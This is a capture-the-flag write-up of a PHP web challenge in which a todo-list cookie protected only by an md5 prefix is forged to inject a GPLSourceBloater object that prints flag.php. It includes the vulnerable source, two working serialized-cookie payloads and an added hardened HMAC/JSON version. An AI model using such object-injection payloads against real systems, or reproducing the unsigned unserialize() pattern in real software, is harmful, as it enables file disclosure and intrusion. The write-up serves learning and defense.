The 2-day pentest of #dientaphcm.vn finished with no highlights. My brain feels very tired, so in this TUMCTF I only tried one challenge, in the Web category.
Main: http://104.154.70.126:10888/index.php
A basic post form and a basic XSS.
But it seems impossible to exploit this bug ^.^ because of the hint "flag is in flag.php", and certainly we need to read the source code of flag.php.
Something available on this website:
http://104.154.70.126:10888/?source
<? // something spam in license.txt ?>
<?php
// Gadget class: __toString() highlights license.txt and then whatever file $this->source names
class GPLSourceBloater{
    public function __toString()
    {
        return highlight_file('license.txt', true).highlight_file($this->source, true);
    }
}
if(isset($_GET['source'])){
    $s = new GPLSourceBloater();
    $s->source = __FILE__;
    echo $s;
    exit;
}
$todos = [];
// Cookie format: md5($m) . $m, where $m is the serialized todos array
if(isset($_COOKIE['todos'])){
    $c = $_COOKIE['todos'];
    $h = substr($c, 0, 32);
    $m = substr($c, 32);
    if(md5($m) === $h){
        $todos = unserialize($m);
    }
}
if(isset($_POST['text'])){
    $todo = $_POST['text'];
    $todos[] = $todo;
    $m = serialize($todos);
    $h = md5($m);
    setcookie('todos', $h.$m);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
?>
<html>
<head>
<style>
* {font-family: "Comic Sans MS", cursive, sans-serif}
</style>
</head>
<h1>My open/libre/free/PHP/Linux/systemd/GNU TODO List</h1>
<a href="?source"><h2>It's super secure, see for yourself</h2></a>
<ul>
<?php foreach($todos as $todo):?>
<li><?=$todo?></li>
<?php endforeach;?>
</ul>
<form method="post" href=".">
<textarea name="text"></textarea>
<input type="submit" value="store">
</form>
I tried to read the source in spite of being tired.
Something happened in my brain:
What is "<? // something spam in license.txt ?>" used for? Does this help us read the source 😀
So "class GPLSourceBloater" does!!!
I tried Google and found http://php.net/manual/en/language.oop5.magic.php
Magic methods are called automatically if the object exists.
The idea in this case is to construct a GPLSourceBloater object.
And object injection helps us do this.
After a POST I get a cookie like setcookie('todos', md5($m).$m); # $m is the serialized data.
To understand the payload below you must have the serialize function in mind:
http://php.net/manual/en/function.serialize.php
To construct a GPLSourceBloater object, I designed the cookie like a serialized object,
and it must have the element $this->source="flag.php".
"todos=dc3d729712b1c4f52083accc39148791O%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D"
But it prints:
Yup, it must be an array of objects to print the source.
"todos=dd0216616f68a33acd7e3817e02fd4d5a%3A1%3A%7Bi%3A1%3BO%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D"
And I get the flag.
Done!! Good night, reader!!
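The reason the cookie can be forged is that md5() is not a signature: anyone can compute it over their own payload. As an added example (my own code, not the challenge's), the script below puts the challenge's check next to a hardened one that uses a keyed HMAC, a constant-time comparison and JSON instead of unserialize(), and feeds both the same cookie value from this write-up. SECRET_KEY and the "buy milk" todo are constructed for the demonstration.

```php
<?php
// Added example, not part of the original write-up: weak cookie check from the
// challenge beside a hardened version. SECRET_KEY is a constructed placeholder
// that a real deployment would keep server-side.

// Gadget class exactly as it appears in the challenge source.
class GPLSourceBloater
{
    public $source;
    public function __toString()
    {
        return highlight_file('license.txt', true) . highlight_file($this->source, true);
    }
}

// Weak check (the challenge's scheme): md5 of the payload, prepended to it.
// Because md5 needs no secret, the prefix proves nothing about who built the cookie,
// and unserialize() with default options will instantiate any class named in it.
function weakVerify(string $cookie): ?array
{
    $h = substr($cookie, 0, 32);
    $m = substr($cookie, 32);
    if (md5($m) !== $h) {
        return null;
    }
    $todos = unserialize($m);
    return is_array($todos) ? $todos : null;
}

// Hardened check: HMAC-SHA256 under a server secret, compared in constant time,
// over a JSON payload that can only ever decode to scalars and arrays.
const SECRET_KEY = 'constructed-server-secret-change-me'; // assumption: server-side only

function hardenedEncode(array $todos): string
{
    $m = json_encode($todos, JSON_THROW_ON_ERROR);
    return hash_hmac('sha256', $m, SECRET_KEY) . $m;
}

function hardenedVerify(string $cookie): ?array
{
    $h = substr($cookie, 0, 64);   // hex SHA-256 is 64 characters
    $m = substr($cookie, 64);
    if (!hash_equals(hash_hmac('sha256', $m, SECRET_KEY), $h)) {
        return null;
    }
    $todos = json_decode($m, true);
    return is_array($todos) ? $todos : null;
}

// The working cookie from the write-up, URL-decoded: an array holding one
// GPLSourceBloater whose source points at flag.php.
$forged = 'a:1:{i:1;O:16:"GPLSourceBloater":1:{s:6:"source";s:8:"flag.php";}}';
$forgedCookie = md5($forged) . $forged;

// Weak scheme: the object is injected (the page would then echo it and trigger __toString).
$todos = weakVerify($forgedCookie);
var_dump($todos !== null && $todos[1] instanceof GPLSourceBloater); // bool(true)

// Hardened scheme: same cookie is rejected, since the HMAC cannot be produced without the key.
var_dump(hardenedVerify($forgedCookie)); // NULL

// A legitimate round trip still works.
var_dump(hardenedVerify(hardenedEncode(['buy milk']))); // array(1) { [0]=> string(8) "buy milk" }
```

The three changes each close a separate hole: the HMAC stops forgery, hash_equals() stops timing leaks on the comparison, and JSON removes the unserialize() gadget entirely. If the data format has to stay PHP serialization, passing `['allowed_classes' => false]` as the second argument to unserialize() at least prevents object instantiation.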